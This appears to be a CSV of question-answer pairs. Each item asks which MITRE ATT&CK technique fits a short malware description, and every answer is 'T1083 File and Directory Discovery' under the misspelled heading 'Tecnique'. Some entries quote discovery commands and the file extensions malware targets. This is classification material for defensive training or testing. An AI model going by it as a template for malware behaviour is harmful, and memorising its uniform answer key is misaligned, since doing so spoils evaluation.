+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to search for a given filename on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar finds a specified directory, lists the files and metadata about those files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy has a command to launch a file browser or explorer on the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has used the FindNextFile command as part of its file deletion process.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used the find command to search for specific files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to list drives on the infected host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can obtain a list of directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of files and directories in C:\ with the command dir /s /a c:\ >> ""C:\windows\TEMP\[RANDOM].tmp"".","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can monitor for system upgrade events by checking for the presence of `/tmp/data/root/dev`.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can list contents of drives and search for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe can monitor the file system to identify files less than 6.4 MB in size with file extensions including .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .odt, .ods, .odp, .eml, and .msg.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot can search for specific files on an infected host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can retrieve file listings from the victim machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete produces file listings in order to search for files to be exfiltrated.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can search for files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex can parse the available drives and directories to determine which files to encrypt.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can enumerate local drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu searches for various filesystem paths to determine what banking applications are installed on the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind has a command to return a directory listing for a specified directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NDiskMonitor can obtain a list of all files and directories as well as logical drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to search for files on the compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can list files and directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use a file monitor to identify .lnk, .doc, .docx, .xls, .xslx, and .pdf files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has the ability to enumerate directory content.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya searches for files ending with dozens of different file extensions prior to encryption.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has used the command appDir=""$(dirname $(dirname ""$currentDir""))"" and $(dirname ""$(pwd -P)"") to construct installation paths.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT has the ability to recursively enumerate files on an infected endpoint.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can extract drive information from the endpoint and search files on the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum has used DriveLetterView to enumerate drive information.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can gather victim drive information.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can search for specific file extensions, including zipped files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth has a command to list its directory and logical drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell has the ability to list files and file characteristics including extension, size, ownership, and permissions.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER can parse `/proc/""process_name""/cmdline` to look for the string `dswsd` within the command line.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to list drives and files on the compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM can conduct file browsing.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may enumerate user directories on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can retrieve lists of files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pcexter has the ability to search for files in specified directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can use the command code do_vslist to send file names, size, and status to C2.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy can identify specific files for exfiltration.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can enumerate storage volumes and folder contents of a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader has commands to list drives on the victim machine and to list file information for a given directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module to enumerate drives and find files recursively.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to list files upon receiving the ls command from C2.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can enumerate files on the local file system and includes a module for enumerating recently accessed files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige can traverse the file system to discover files to encrypt by identifying specific extensions defined in a hardcoded list.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc lists files in directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Psylo has commands to enumerate all storage devices and to find all files that start with a particular string.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can walk through directories and recursively search for strings in files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify whether it has been run previously on a host by checking for a specified folder.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has the ability to identify specific files and directories that are not to be encrypted.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has the ability to gather a list of files and directories on the infected system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can check for specific files and directories associated with virtualization and malware analysis.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can collect directory and file lists.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can enumerate and search for files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can search for files on the infected machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi searches for files on the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteUtilities can enumerate files and directories on a target machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover automatically searches for files on local drives based on a predefined list of file extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can identify specific files and directories to exclude from the encryption process.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has enumerated files and folders on all mounted drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to get directory listings or drive information on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT has a command to obtain a directory listing.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA can enumerate files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SOUNDBITE is capable of enumerating and manipulating files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST had commands to enumerate files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT enumerated the Orion software Visual Studio solution directory path.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can search a compromised host for specific files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can use a specific module for file enumeration.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt has the capability to identify the drive type on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can identify recently opened files by using an LNK format parser to extract the original file path from LNK files found in either `%USERPROFILE%\Recent` (Windows XP) or `%APPDATA%\Microsoft\Windows\Recent` (newer Windows versions) .,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can list directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has the ability to search for specific files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape searches for the Kubernetes config file and other related files using a regular expression.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can enumerate files on a target system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader recursively searches through directories for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can execute enum to enumerate files in storage on a compromised system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang has the ability to list directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to enumerate drive types.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can enumerate files on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can parse the hard drive on a compromised host to identify specific file extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses a driver to scan for specific filesystem driver objects.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck checks its directory location in an attempt to avoid launching in a sandbox.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can search files on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can use DirectoryList to enumerate files in a specified directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to discover drive information on the infected host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can search directories for files on the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can search for specific files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to index files from drives, user profiles, and removable drives.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can obtain file and directory information.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can enumerate files and directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can search for specific files and list directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has the capability to gather the victim's current directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can detect the victim's file or folder list.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can search for specific files on a compromised system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can list directories on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can enumerate files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can enumerate directories on a compromise host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can enumerate files and directories just prior to encryption.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can locate files based on hardcoded file extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM sets a WH_CBT Windows hook to search for and capture files on the victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to enumerate the users home directory and the path to its own application bundle.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can list all files and their associated attributes, including filename, type, owner, creation time, last access time, last write time, size, and permissions.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~/Library/Application\ Support/MobileSync/Backup/.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can find and append specific files on Ivanti Connect Secure VPNs based upon received commands.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to enumerate files and drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the echo %APPDATA% command to list the contents of the directory. Zebrocy can obtain the current execution path as well as perform drive enumeration.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda searches for specific directories on the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox can enumerate files on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command to open a file manager and explorer on the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can parse collected files to identify specific file extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd can be used to find files and directories with native functionality such as dir commands.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to list the directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can browse file systems.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can recursively enumerate files in an operator-provided directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can browse file systems using a file manager module.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty gathers information on victim’s drives and has a plugin for document listing.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
